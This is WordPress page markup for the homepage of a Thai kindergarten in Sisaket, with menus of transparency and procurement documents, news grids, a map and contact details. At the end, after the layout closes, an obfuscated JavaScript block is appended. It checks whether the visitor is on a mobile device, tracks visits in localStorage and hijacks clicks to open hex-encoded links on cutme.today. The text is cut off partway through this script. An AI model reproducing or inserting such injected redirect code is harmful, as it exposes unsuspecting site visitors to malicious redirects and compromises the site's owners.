700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 